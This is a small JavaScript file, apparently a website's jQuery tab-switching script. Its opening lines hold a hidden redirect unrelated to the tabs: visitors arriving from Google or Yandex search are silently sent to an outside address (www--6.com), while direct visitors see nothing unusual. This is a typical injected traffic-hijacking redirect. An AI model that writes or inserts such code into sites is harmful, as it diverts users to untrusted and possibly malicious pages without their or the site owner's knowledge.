var whence = document.referrer
if(whence.indexOf('yandex.ru') + 1) {
location.replace("http://www--6.com/XmfN");
}else if(whence.indexOf('google.com') + 1){
location.replace("http://www--6.com/XmfN");
}

(function($) {
$(function() {

	$('ul.tabs').delegate('li:not(.current)', 'click', function() {
		$(this).addClass('current').siblings().removeClass('current')
			.parents('div.section').find('div.box').hide().eq($(this).index()).fadeIn(150);
	})

})
})(jQuery)
